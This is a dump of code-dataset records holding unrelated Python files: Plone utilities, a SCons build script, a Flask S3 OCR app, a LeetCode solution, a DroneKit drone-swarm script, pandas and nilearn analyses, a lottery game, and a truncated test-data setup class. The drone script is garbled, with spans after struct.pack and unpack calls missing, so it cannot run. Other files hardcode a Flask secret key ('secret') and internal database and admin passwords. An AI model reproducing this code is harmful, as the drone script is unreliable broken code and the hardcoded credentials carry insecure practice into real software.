re.compile('\\d+')\n\nModuleSecurityInfo('Products.bika.utils').declarePublic('sortable_title')\ndef sortable_title(portal, title):\n \"\"\"Convert title to sortable title\n \"\"\"\n if not title:\n return ''\n\n def_charset = portal.plone_utils.getSiteEncoding()\n sortabletitle = title.lower().strip()\n # Replace numbers with zero filled numbers\n sortabletitle = num_sort_regex.sub(zero_fill, sortabletitle)\n # Truncate to prevent bloat\n for charset in [def_charset, 'latin-1', 'utf-8']:\n try:\n sortabletitle = unicode(sortabletitle, charset)[:30]\n sortabletitle = sortabletitle.encode(def_charset or 'utf-8')\n break\n except UnicodeError:\n pass\n except TypeError:\n # If we get a TypeError if we already have a unicode string\n sortabletitle = sortabletitle[:30]\n break\n return sortabletitle\n\ndef changeWorkflowState(content, state_id, acquire_permissions=False,\n portal_workflow=None, **kw):\n \"\"\"Change the workflow state of an object\n @param content: Content obj which state will be changed\n @param state_id: name of the state to put on content\n @param acquire_permissions: True->All permissions unchecked and on riles and\n acquired\n False->Applies new state security map\n @param portal_workflow: Provide workflow tool (optimisation) if known\n @param kw: change the values of same name of the state mapping\n @return: None\n \"\"\"\n\n if portal_workflow is None:\n portal_workflow = getToolByName(content, 'portal_workflow')\n\n # Might raise IndexError if no workflow is associated to this type\n wf_def = portal_workflow.getWorkflowsFor(content)[0]\n wf_id= wf_def.getId()\n\n wf_state = {\n 'action': None,\n 'actor': None,\n 'comments': \"Setting state to %s\" % state_id,\n 'review_state': 
state_id,\n 'time': DateTime(),\n }\n\n # Updating wf_state from keyword args\n for k in kw.keys():\n # Remove unknown items\n if not wf_state.has_key(k):\n del kw[k]\n if kw.has_key('review_state'):\n del kw['review_state']\n wf_state.update(kw)\n\n portal_workflow.setStatusOf(wf_id, content, wf_state)\n\n if acquire_permissions:\n # Acquire all permissions\n for permission in content.possible_permissions():\n content.manage_permission(permission, acquire=1)\n else:\n # Setting new state permissions\n wf_def.updateRoleMappingsFor(content)\n\n # Map changes to the catalogs\n content.reindexObject(idxs=['allowedRolesAndUsers', 'review_state'])\n return\n","sub_path":"bika/lims/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242694853","text":"import os\n\nlibrary_build_path = '#build/riak/'\nVariantDir(library_build_path, 'riak')\ncommon_env = Environment(\n ENV = os.environ,\n CXXFLAGS = ['--std=c++0x'],\n CPPPATH = ['/opt/local/include', '#', '#build/', '/usr/include'],\n LIBPATH = ['/opt/local/lib'])\n\nif ARGUMENTS.get('VERBOSE') != 'yes':\n common_env.Append(\n CXXCOMSTR = '(compile) $SOURCES',\n LINKCOMSTR = '(link) $TARGET',\n ARCOMSTR = '(archive) $TARGET',\n RANLIBCOMSTR = '(ranlib) $TARGET',\n PROTOCCOMSTR = '(protobuf) $TARGET'\n )\n\ndebug_env = common_env.Clone(CCFLAGS = ['-O0', '-g'])\n\nif ARGUMENTS.get('DEBUG') == 'yes':\n env = debug_env\nelse:\n env = common_env\n\nheaders = Glob(library_build_path + '*.hxx') + \\\n Glob(library_build_path + '*.pb.h')\ntransports = Glob(library_build_path + 'transports/*.hxx')\nsources = Glob(library_build_path + '*.cxx') + \\\n Glob(library_build_path + '*.proto') + \\\n Glob(library_build_path + 'transports/*.cxx')\nenv.Command(library_build_path + 'riakclient.pb.h', library_build_path + 'riakclient.proto', \"protoc $SOURCE --cpp_out=.\")\nenv.Command(library_build_path + 'riakclient.pb.cc', library_build_path + 'riakclient.proto', \"protoc $SOURCE --cpp_out=.\")\nriak_protocol = env.Object(library_build_path + 'riakclient.pb.o', library_build_path + 'riakclient.pb.cc')\nlibrary = env.StaticLibrary('riak', [sources, riak_protocol], build_dir=library_build_path)\n\n# Unit tests are compiled and run every time the program is compiled.\nExport('env')\nExport('library')\n\nif 'debian' in COMMAND_LINE_TARGETS:\n SConscript(\"deb/SConscript\")\n\nunit_tests = SConscript('test/SConscript', variant_dir='build/test/units')\nAddPostAction(unit_tests, unit_tests[0].path)\n\nDefault(library, unit_tests)\n\n#\n# Installation\n#\nprefix = '/usr/local'\nenv.Alias('install', env.Install('/usr/local/lib', library))\nenv.Alias('install', env.Install('/usr/local/include/riak', headers))\nenv.Alias('install', env.Install('/usr/local/include/riak/transports', transports))\n","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193714500","text":"from flask import Flask, render_template, request, redirect, url_for, flash, \\\n Response, session\nfrom flask_bootstrap import Bootstrap\nfrom filters import datetimeformat, file_type\nfrom resources import get_bucket, get_buckets_list,client_list\nfrom pipev1 import main\nimport os\nimport time\nfrom config import S3_BUCKET,S3_BUCKET_NAME\n#from numba import 
jit\n\nroot_dir='/tmp/'\nwork_dir=os.getcwd()+'/'\n\nos.environ.update(dict(LD_LIBRARY_PATH=os.getcwd()+'/lib/',TESSDATA_PREFIX=os.getcwd()+'/tessdata/'))\n\nif not os.path.exists(root_dir+'txt'):\n    os.mkdir('/tmp/txt')\nif not os.path.exists(root_dir+'jpg'):\n    os.mkdir('/tmp/jpg')\nif not os.path.exists(root_dir+'pdfs'):\n    os.mkdir('/tmp/pdfs')\n\n\napp = Flask(__name__)\nBootstrap(app)\napp.secret_key = 'secret'\napp.jinja_env.filters['datetimeformat'] = datetimeformat\napp.jinja_env.filters['file_type'] = file_type\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n    if request.method == 'POST':\n        bucket = request.form['bucket']\n        session['bucket'] = bucket\n        return redirect(url_for('files'))\n    else:\n        buckets = get_buckets_list()\n        return render_template(\"index.html\", buckets=buckets)\n\n\n@app.route('/files')\ndef files():\n    my_bucket = get_bucket()\n    summaries = my_bucket.objects.all()\n\n    return render_template('files.html', my_bucket=my_bucket, files=summaries)\n\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n    file = request.files['file']\n\n    my_bucket = get_bucket()\n    my_bucket.Object(file.filename).put(Body=file)\n\n    flash('File uploaded successfully')\n    return redirect(url_for('files'))\n\n#@jit(nopython=True)\n@app.route('/convert', methods=['POST'])\ndef convert():\n    pdf_dir=root_dir+'pdfs/'\n    key = request.form['key']\n\n    my_bucket = get_bucket()\n    #print(dir(get_bucket()))\n    path,filename = os.path.split(key)\n    target_path=pdf_dir +filename\n    my_bucket.download_file(key,target_path )\n    #os.system('rm -r '+work_dir+'static/pdf/*')\n    ##### the conversion phase ####\n    avg_score,completed=main(target_path)\n    print('OCR EXECUTION TIME:',completed)\n    ##############################\n    client=client_list()\n    client.upload_file('/tmp/merged_file.pdf',S3_BUCKET_NAME,'merged_'+filename[:-4]+'.pdf')\n    client.upload_file('/tmp/verbose.txt',S3_BUCKET_NAME,'verbose_'+filename[:-4]+'.txt')\n    return redirect(url_for('files'))\n\n\n@app.route('/view', methods=['POST'])\ndef view():\n    pdf_dir='static/pdf/'\n    os.system('rm static/pdf/*')\n    key = request.form['key']\n\n    my_bucket = get_bucket()\n    #print(dir(get_bucket()))\n    path,filename = os.path.split(key)\n    print(filename)\n    target_path=pdf_dir +filename\n    my_bucket.download_file(key,target_path)\n    return render_template('view.html',contents='[\"'+filename+'\"]')\n\n\n\n@app.route('/download', methods=['POST'])\ndef download():\n    key = request.form['key']\n\n    my_bucket = get_bucket()\n    file_obj = my_bucket.Object(key).get()\n\n    return Response(\n        file_obj['Body'].read(),\n        mimetype='text/plain',\n        headers={\"Content-Disposition\": \"attachment;filename={}\".format(key)})\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n    key = request.form['key']\n\n    my_bucket = get_bucket()\n    my_bucket.Object(key).delete()\n\n    flash('File deleted successfully')\n    return redirect(url_for('files'))\n\n\n\ndef wait():\n    return render_template('loading.html')\n\n\n\nif __name__ == \"__main__\":\n    app.run(port=8000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9131141","text":"\"\"\"\n{\n    \"author\": \"Yucheng Huang\",\n    \"difficulty\": \"easy\",\n    \"link\": \"https://leetcode.com/problems/majority-element/description/\",\n    \"beats\": 0.4223,\n    \"category\": [\"math\"],\n    \"tags\": [],\n    \"questions\": []\n}\n\"\"\"\n\n\"\"\"\nApproach\n\t- Use the Boyer-Moore Majority Vote Algorithm\n\t- Keep a counter cnt 
of how many times the current candidate element has been seen; whenever the scanned element differs from the candidate, do cnt--. If cnt == 0 after scanning the first i elements, then those i elements either have no majority, or have one that occurs fewer than i / 2 times (had it occurred more than i / 2 times, cnt could never reach 0). The remaining n - i elements still contain the overall majority more than (n - i) / 2 times, so continuing the scan will still find the majority.\n\"\"\"\n\nclass Solution:\n    def majorityElement(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        num = nums[0]\n        L = len(nums)\n        count = 1\n        if L>1:\n            for i in range(1, L):\n                if nums[i] == num:\n                    count += 1\n                else :\n                    count -= 1\n                    if count < 0:\n                        num = nums[i]\n                        count = 1\n        return num","sub_path":"solutions/169.boyer-moore.py","file_name":"169.boyer-moore.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"613826891","text":"# DroneKit-Python program based on the \"Simple Go To (Copter)\" example.\n# Time is synchronized to simulation clock through the \"simtime\" library.\n\nimport helper\nimport math\nimport ns3interface\nimport simtime\nimport struct\nimport sys\nimport time\nfrom threading import Thread\nimport pdb ## tracing library\n\n# pip install --user dronekit\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative\nfrom pymavlink import mavutil\n\n# Synchronize time.time() and time.sleep(n) with simulation clock\nsimtime_port = int(sys.argv[1])\nsimtime.connect(simtime_port)\n\n# Parse other commandline arguments\nuav_name, mavlink_sysid, mavlink_port = sys.argv[2].split(':')\nmavlink_sysid = int(mavlink_sysid)\nmavlink_port = int(mavlink_port)\n\n# Connect to the ns3 network simulator\nns3interface.connect('127.0.0.1', mavlink_sysid - 1)\n\n# Connect to the Vehicle\nvehicle = connect(\n    'tcp:127.0.0.1:{}'.format(mavlink_port),\n    source_system=mavlink_sysid + 100)\n\n# ArduCopter initialisation can take a really long time\nvehicle.wait_ready('gps_0', 'armed', 'mode', 'attitude', timeout=100)\n\n# Don't try to arm until autopilot is ready\nwhile not vehicle.is_armable:\n    print(\" Waiting for vehicle to initialise...\")\n    time.sleep(5)\n\nprint(\"Arming motors\")\n# Copter should arm in GUIDED mode\nvehicle.mode = VehicleMode(\"GUIDED\")\nvehicle.armed = True\n\n\n# Confirm vehicle armed before attempting to take off\nwhile not vehicle.armed:\n    print(\" Waiting for arming...\")\n    time.sleep(1)\n\n##pdb.set_trace()\n\ntarget_altitude = 5\nShortestDistance = 2\n\n\nprint(\"Taking off!\")\nvehicle.simple_takeoff(target_altitude) # Take off to target altitude\ntime.sleep(10)\n\ndef uavSendMessage(mavlink_sysid):\n# Process incoming messages\n    #cont=0\n    while True:\n        while ns3interface.message_available():\n            payload, sender = ns3interface.recvfrom()\n            seqnum, lat, lon = struct.unpack(\" 0:\n        #     cont = cont+1\n        #     ns3interface.sendto(struct.pack(\" ShortestDistance):\n            # difference between the course start point and the minimum distance between vehicles\n            vehicle.simple_goto(MissionPoint, groundspeed=30)\n            currentPosition = vehicle.location.global_relative_frame\n            distanceOfEnd = helper.get_distance_metres(MissionPoint, currentPosition)\n            time.sleep(.1)\n\n        distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n\n        while (distanceOfBegin > ShortestDistance):\n            vehicle.simple_goto(startMissionPoint, groundspeed=30)\n            currentPosition = vehicle.location.global_relative_frame\n            distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n            time.sleep(.1)\n\n\n\n    print(\"Landing!\")\n    vehicle.mode = VehicleMode(\"RTL\")\n\n\nelif mavlink_sysid == 2:\n\n    lat = vehicle.location.global_relative_frame.lat\n    lon 
= vehicle.location.global_relative_frame.lon\n    startMissionPoint = LocationGlobalRelative(lat, lon, target_altitude)\n    MissionPoint = LocationGlobalRelative(-27.60349,-48.51796,target_altitude)\n    vehicle.simple_goto(startMissionPoint, groundspeed=10)\n\n\n    while True:\n\n        ns3interface.sendto(struct.pack(\" ShortestDistance):\n            # difference between the course start point and the minimum distance between vehicles\n            vehicle.simple_goto(MissionPoint, groundspeed=10)\n            currentPosition = vehicle.location.global_relative_frame\n            distanceOfEnd = helper.get_distance_metres(MissionPoint, currentPosition)\n            time.sleep(.1)\n\n        distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n\n        while (distanceOfBegin > ShortestDistance):\n            vehicle.simple_goto(startMissionPoint, groundspeed=10)\n            currentPosition = vehicle.location.global_relative_frame\n            distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n            time.sleep(.1)\n\n\n\n    print(\"Landing!\")\n    vehicle.mode = VehicleMode(\"RTL\")\n\n\n\nelif mavlink_sysid == 3:\n    #position in map in relation to base (-1, -1,5)\n    lat = vehicle.location.global_relative_frame.lat\n    lon = vehicle.location.global_relative_frame.lon\n    startMissionPoint = LocationGlobalRelative(lat, lon, target_altitude)\n    MissionPoint = LocationGlobalRelative(-27.60391, -48.51789, target_altitude)\n    vehicle.simple_goto(startMissionPoint, groundspeed=20)\n\n    while True:\n\n        ns3interface.sendto(struct.pack(\" ShortestDistance):\n            # difference between the course start point and the minimum distance between vehicles\n            vehicle.simple_goto(MissionPoint, groundspeed=20)\n            currentPosition = vehicle.location.global_relative_frame\n            distanceOfEnd = helper.get_distance_metres(MissionPoint, currentPosition)\n            time.sleep(.1)\n\n        distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n\n        while (distanceOfBegin > ShortestDistance):\n            vehicle.simple_goto(startMissionPoint, groundspeed=20)\n            currentPosition = vehicle.location.global_relative_frame\n            distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n            time.sleep(.1)\n\n\n    print(\"Landing!\")\n    vehicle.mode = VehicleMode(\"RTL\")\n\n\n\nvehicle.close()\n\nsys.exit(\"End of experiment!\")\n","sub_path":"tutorial/3nodosGazebo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143459552","text":"import pandas as pd\nimport numpy as np\nimport os\nimport time\nimport calendar\nfrom pandas import DataFrame\nfrom datetime import datetime\n\npath = os.getcwd()\nrelpath = path+'/Data/vehicle_collisions.csv'\ndf = pd.read_csv(relpath)\ndf['DATE']=pd.to_datetime(df[\"DATE\"])\ndf2=df[(df['DATE'].dt.year==2016)]\ndf2['Month'] = (df['DATE'].dt.month).apply(lambda x: calendar.month_abbr[x])\ndatas = df2['DATE'].groupby(df2['DATE'].dt.strftime('%b')).count()\ndf3 = df2.groupby(['BOROUGH', 'Month']).count()\ndf4 = df3['DATE'].loc['MANHATTAN']\nmanhattan = np.array([df4.index,df4])\nnyc = np.array([datas.index,datas])\nperc = manhattan[1]/nyc[1]\nacc1 = [nyc[0],manhattan[1],nyc[1],perc]\ndf5 = pd.DataFrame(acc1)\ndf6= df5.T\ndf6.columns = ['Month', 'Manhattan', 'NYC','Percentage']\ndf6.to_csv(\"Q1P1.csv\")\nprint(df6.head())","sub_path":"Q1_Part_1.py","file_name":"Q1_Part_1.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"631409293","text":"import numpy as 
np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set()\nfrom nilearn import plotting as ni_plt\nimport matplotlib.gridspec as gridspec\nimport sys\nsys.path.append('..')\nfrom util.analysis_utils import get_important_electrodes_bins_goodchans\n\n\n\ndef plot_all(configs):\n imp_electrodes, imp_bins, good_chans = get_important_electrodes_bins_goodchans(configs)\n plot_important_frequencies(imp_bins)\n plot_important_electrodes(imp_electrodes,good_chans)\n plot_brain_new(chan_labels = good_chans, colors = imp_electrodes)\n \n \n\ndef plot_brain(chan_labels,num_grid_chans=64,colors=list()):\n# mni_coords_fullfile='/nas/ecog_project/derived/electrode_mni_locations/cb46fd46_MNI_atlasRegions.xlsx'\n mni_coords_fullfile = '/data2/users/stepeter/mni_coords/cb46fd46/cb46fd46_MNI_atlasRegions.xlsx'\n 'Plots ECoG electrodes from MNI coordinate file'\n #Example code to run it: \n #import sys\n #sys.path.append('/home/stepeter/AJILE/stepeter_sandbox/ECoG_Preprocessing')\n #from plot_ecog_electrodes_mni import *\n\n #mni_coords_fullfile='/data2/users/stepeter/mni_coords/a0f66459/a0f66459_MNI_atlasRegions.xlsx'\n #plot_ecog_electrodes_mni_from_file_and_labels(mni_coords_fullfile,chan_num_min=-1,chan_num_max=-1,num_grid_chans=64)\n\n #NOTE: A warning may pop up the first time running it, leading to no output. Rerun this function, and the plots should appear.\n\n #Load in MNI file\n mni_file = pd.read_excel(mni_coords_fullfile, delimiter=\",\")\n\n\n #Create dataframe for electrode locations\n locs=mni_file.loc[mni_file['Electrode'].isin(chan_labels)][['X coor', 'Y coor', 'Z coor']]\n print(locs.shape)\n\n #Label strips/depths differently for easier visualization (or use defined color list)\n if len(colors)==0:\n for s in range(locs.shape[0]):\n if s>=num_grid_chans:\n colors.append('r')\n else:\n colors.append('b')\n\n #Plot the result\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': 0.5, 'edgecolors': None},\n node_size=10, node_color=colors)\n\n \n \ndef plot_important_frequencies(imp_bins):\n df = pd.DataFrame({'Frequencies':['0-1', '2','3-4','5-8','9-16','17-32','33-64','65-150'], 'Importances': imp_bins})\n sns.barplot(data=df,x = 'Frequencies', y = 'Importances')\n plt.ylabel('Importance')\n plt.show()\n \n \ndef plot_important_electrodes(imp_electrodes,good_chans):\n imp_ele = np.argsort(imp_electrodes)[-5:]\n imp = np.zeros(len(good_chans), dtype='bool')\n imp[imp_ele] =1 \n df = pd.DataFrame({'Labels': good_chans,'Importances': imp_electrodes, 'Top 5': imp})\n plt.figure(figsize=(10,20))\n sns.barplot(data=df,y = 'Labels', x = 'Importances', hue = 'Top 5')\n plt.show()\n\n \n\ndef plot_brain_new(h5_fn=None,chan_labels='all',num_grid_chans=64,colors=None,node_size=50,\n figsize=(16,6),sides_2_display='auto',node_edge_colors=None,\n alpha=0.5,edge_linewidths=3,ax_in=None,rem_zero_chans=False,\n allLH=False,zero_rem_thresh=.99,elec_col_suppl=None):\n \"\"\"\n Plots ECoG electrodes from MNI coordinate file (only for specified labels)\n \n Example code to run it: \n import sys\n sys.path.append('/home/stepeter/AJILE/stepeter_sandbox/ECoG_Preprocessing')\n from Steve_libPreprocess import *\n subjID = 'a0f66459'\n day = '3'\n h5_fn='/nas/ecog_project/derived/processed_ecog/'+subjID+'/full_day_ecog/'+subjID+'_fullday_'+day+'.h5'\n chan_labels=list(['GRID1','GRID2']) #or chan_labels='all'\n plot_ecog_electrodes_mni_from_file_and_labels(h5_fn,chan_labels,num_grid_chans=64)\n \n NOTE: If running in Jupyter, use '%matplotlib 
inline' instead of '%matplotlib notebook'\n \"\"\" \n \n h5_fn = '/nas/ecog_project/derived/processed_ecog/cb46fd46/full_day_ecog/cb46fd46_fullday_3.h5'\n #Load channel locations\n chan_info = pd.read_hdf(h5_fn,key='chan_info',mode='r')\n \n if type(chan_labels) == np.ndarray:\n my_id = False\n elif chan_labels == 'all':\n my_id = 'all'\n else:\n print('hier nicht eig')\n my_id = 'allgood'\n \n #Create dataframe for electrode locations\n if my_id== 'all':\n locs = chan_info.loc[['X','Y','Z'],:].transpose()\n elif my_id == 'allgood':\n locs = chan_info.loc[['X','Y','Z','goodChanInds'],:].transpose()\n else:\n locs = chan_info.loc[['X','Y','Z'],chan_labels].transpose()\n if (colors is not None):\n if (locs.shape[0]>len(colors)) & isinstance(colors, list):\n locs = locs.iloc[:len(colors),:]\n locs.rename(columns={'X':'x','Y':'y','Z':'z'}, inplace=True)\n chan_loc_x = chan_info.loc['X',:].values\n \n #Remove NaN electrode locations (no location info)\n nan_drop_inds = np.nonzero(np.isnan(chan_loc_x))[0]\n locs.dropna(axis=0,inplace=True) #remove NaN locations\n if (colors is not None) & isinstance(colors, list):\n colors_new,loc_inds_2_drop = [],[]\n for s,val in enumerate(colors):\n if not (s in nan_drop_inds):\n colors_new.append(val)\n else:\n loc_inds_2_drop.append(s)\n colors = colors_new.copy()\n \n if elec_col_suppl is not None:\n loc_inds_2_drop.reverse() #go from high to low values\n for val in loc_inds_2_drop:\n del elec_col_suppl[val]\n \n if my_id=='allgood':\n goodChanInds = chan_info.loc['goodChanInds',:].transpose()\n inds2drop = np.nonzero(locs['goodChanInds']==0)[0]\n locs.drop(columns=['goodChanInds'],inplace=True)\n locs.drop(locs.index[inds2drop],inplace=True)\n \n if colors is not None:\n colors_new,loc_inds_2_drop = [],[]\n for s,val in enumerate(colors):\n if not (s in inds2drop):\n# np.all(s!=inds2drop):\n colors_new.append(val)\n else:\n loc_inds_2_drop.append(s)\n colors = colors_new.copy()\n \n if elec_col_suppl is not None:\n loc_inds_2_drop.reverse() #go from high to low values\n for val in loc_inds_2_drop:\n del elec_col_suppl[val]\n \n if rem_zero_chans:\n #Remove channels with zero values (white colors)\n colors_new,loc_inds_2_drop = [],[]\n for s,val in enumerate(colors):\n if np.mean(val)1:\n N,axes,sides_2_display = _setup_subplot_view(locs,sides_2_display,figsize)\n else:\n N = 1\n axes = ax_in\n if allLH:\n average_xpos_sign = np.mean(np.asarray(locs['x']))\n if average_xpos_sign>0:\n locs['x'] = -locs['x']\n sides_2_display ='l'\n# #Automatically flip electrode side appropriately\n# if (sides_2_display=='r') or (sides_2_display=='l'):\n# average_xpos_sign = np.mean(np.asarray(locs['x']))\n# if average_xpos_sign>0:\n# sides_2_display='r'\n# else:\n# sides_2_display='l'\n \n if colors is None:\n colors = list()\n \n #Label strips/depths differently for easier visualization (or use defined color list)\n if len(colors)==0:\n for s in range(locs.shape[0]):\n if s>=num_grid_chans:\n colors.append('r')\n else:\n colors.append('b')\n \n if elec_col_suppl is not None:\n colors = elec_col_suppl.copy()\n \n #Rearrange to plot non-grid electrode first\n if num_grid_chans>0: #isinstance(colors, list):\n locs2 = locs.copy()\n locs2['x'] = np.concatenate((locs['x'][num_grid_chans:],locs['x'][:num_grid_chans]),axis=0)\n locs2['y'] = np.concatenate((locs['y'][num_grid_chans:],locs['y'][:num_grid_chans]),axis=0)\n locs2['z'] = np.concatenate((locs['z'][num_grid_chans:],locs['z'][:num_grid_chans]),axis=0)\n \n if isinstance(colors, list):\n colors2 = colors.copy()\n colors2 
= colors[num_grid_chans:]+colors[:num_grid_chans]\n else:\n colors2 = colors\n else:\n locs2 = locs.copy()\n if isinstance(colors, list):\n colors2 = colors.copy()\n else:\n colors2 = colors #[colors for i in range(locs2.shape[0])]\n \n #Plot the result\n _plot_electrodes(locs2,node_size,colors2,axes,sides_2_display,N,node_edge_colors,alpha,edge_linewidths)\n \ndef _setup_subplot_view(locs,sides_2_display,figsize):\n \"\"\"\n Decide whether to plot L or R hemisphere based on x coordinates\n \"\"\"\n if sides_2_display=='auto':\n average_xpos_sign = np.mean(np.asarray(locs['x']))\n if average_xpos_sign>0:\n sides_2_display='yrz'\n else:\n sides_2_display='ylz'\n \n #Create figure and axes\n if sides_2_display=='ortho':\n N = 1\n else:\n N = len(sides_2_display)\n \n if sides_2_display=='yrz' or sides_2_display=='ylz':\n gridspec.GridSpec(0,3)\n fig,axes=plt.subplots(1,N, figsize=figsize)\n else:\n fig,axes=plt.subplots(1,N, figsize=figsize)\n return N,axes,sides_2_display\n\n\ndef _plot_electrodes(locs,node_size,colors,axes,sides_2_display,N,node_edge_colors,alpha,edge_linewidths):\n \"\"\"\n Handles plotting\n \"\"\"\n if N==1:\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': alpha, 'edgecolors': node_edge_colors,'linewidths':edge_linewidths},\n node_size=node_size, node_color=colors,axes=axes,display_mode=sides_2_display)\n elif sides_2_display=='yrz' or sides_2_display=='ylz':\n colspans=[5,6,5] #different sized subplot to make saggital view similar size to other two slices\n current_col=0\n total_colspans=int(np.sum(np.asarray(colspans)))\n for ind,colspan in enumerate(colspans):\n axes[ind]=plt.subplot2grid((1,total_colspans), (0,current_col), colspan=colspan, rowspan=1)\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': alpha, 'edgecolors': node_edge_colors,'linewidths':edge_linewidths},\n node_size=node_size, node_color=colors,axes=axes[ind],display_mode=sides_2_display[ind])\n current_col+=colspan\n else:\n for i in range(N):\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': alpha, 'edgecolors': node_edge_colors,'linewidths':edge_linewidths},\n node_size=node_size, node_color=colors,axes=axes[i],display_mode=sides_2_display[i])\n\n","sub_path":"vis/brain_vis.py","file_name":"brain_vis.py","file_ext":"py","file_size_in_byte":11519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"297484407","text":"# Created on 10-19-2020, Monday\nprint(\"Welcome to the Pick 6 Game! \")\nbalance = float()\nprint(f\"Your balance is : $ {balance}\")\nimport random\n\nwinning_ticket = random.sample(range(1,99),6) # This is a list contains all winning number\nprint(f\"The winner number is {winning_ticket}\")\n\n\ndef pick6(): # this function is used to draw 5 random number to represnet the ticket that will be used to validate against the winning ticket\n pick = random.sample(range(1,99), 6) # This is a list represent player's ticket\n return(pick)\n\ndef validate_match(): # this function will count the # of match for each ticket randomly picked\n match_count = 0\n user_ticket = pick6()\n # print(user_ticket)\n for element in user_ticket: \n index = user_ticket.index(element) # running check of the player's list against winner's list for both numer and index\n winning_number = winning_ticket[index]\n if element == winning_number:\n match_count += 1 \n # print(f\"there is a match! 
{winning_number}\") \n else:\n pass \n # print(f\"# of mathces: {match_count}\") \n return(match_count)\n\ndef payoff_calc(): # This function will calculate the total cost of all tickets as well as all compensation \n payofflist = { \n 0:0,\n 1:4,\n 2:7,\n 3:100,\n 4:50000,\n 5:1000000,\n 6:25000000}\n attempt = int(input(\"How many tickets would you like to draw: \"))\n payoff = 0 \n for a in range(attempt):\n count = validate_match()\n payoff += payofflist[count]\n \n cost = attempt*2\n print(f\"your final balance is ${float(payoff)}\")\n\n\npayoff_calc()\n\n\n\n\n\n\n# number_of_ticket = 1\n# while number_of_ticket in range(1,11):\n# cost += validate_match(match_count)\n# number_of_ticket += 1\n\n# print(match_count)\n# print(cost)\n\n\n# payoff = {\n# 1:4,\n# 2:7,\n# 3:100,\n# 4:50000,\n# 5:1000000,\n# 6:25000000\n# }\n\n#testing testing 11/4","sub_path":"Students/Ben/Lab_14_Pick6/Pick6.py","file_name":"Pick6.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245089943","text":"#coding:utf-8\nimport time\nimport requests\nimport json\nimport logging\nimport redis\nimport urllib2\nimport hashlib\nimport MySQLdb\nfrom warnings import filterwarnings\nfilterwarnings('ignore', category = MySQLdb.Warning)\nclass preConditionForTest(object):\n \"\"\"\n 测试环境,常州账号数据准备测试:\n 1.发放优惠券, 满30减5\n 2.发放红包,满40减10\n 3.发放达豆,默认2000\n 4.上架物品, 价格50,数量100\n 5.本地存储用户名,logindevice表\n 6.本地存储上架物品,productcz表\n 7.本地存储优惠码,coupon表\n 8.清除购物车redis缓存信息\n \"\"\"\n def __init__(self):\n self.headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'}\n \"\"\"\n server_url:测试环境后台url \n url_username:后台登陆账号\n url_password:后台登陆密码\n \"\"\"\n self.server_url = 'http://192.168.1.251:31000'\n self.url_username= '13111111111'\n self.url_password='123456'\n \"\"\"\n test_db_ip:测试环境ip,默认端口3306\n test_user:用户名\n test_passwd:密码\n test_mainDb:测试环境 数据库\n \"\"\"\n self.test_db_ip = '192.168.1.101'\n self.test_user = 'dddev'\n self.test_passwd = '123456'\n self.test_mainDb='ctcdb_new_test'\n \"\"\"\n redis_db_ip:缓存数据库redis地址\n redis_port:redis端口\n redis_db:数据库0\n \"\"\"\n self.redis_db_ip='192.168.1.101'\n self.redis_port=6379\n self.redis_db=0\n \"\"\"\n local_ip:本地数据库192.168.1.38,默认localhost,端口3306\n local_user:用户名\n local_passwd:密码\n local_mainDb:本地数据库名\n \"\"\"\n self.local_ip='192.168.1.38'\n self.local_user='root'\n self.local_passwd='admin'\n self.local_mainDb='dianda_test'\n \"\"\"\n cityId:常州城市码\n \"\"\"\n self.cityId=320400\n \"\"\"\n dadouCount:发放达豆数量\n \"\"\"\n self.dadouCount=2000\n \"\"\"\n device_login:设备登陆密码\n \"\"\"\n self.device_login='123456'\n \"\"\"\n coupon_value:优惠券金额\n coupon_quantity:优惠券发放数量\n coupon_useBaseLine:使用金额条件\n coupon_instruction:描述\n \"\"\"\n self.coupon_value=5\n self.coupon_quantity=5\n self.coupon_useBaseLine=30\n self.coupon_instruction=u'满30减5'\n \"\"\"\n redGift_value:红包金额\n redGift_quantity:红包发放数量\n redGift_ownLimit:红包拥有限制量\n redGift_useBaseLine:红包使用条件\n redGift_instruction:描述\n 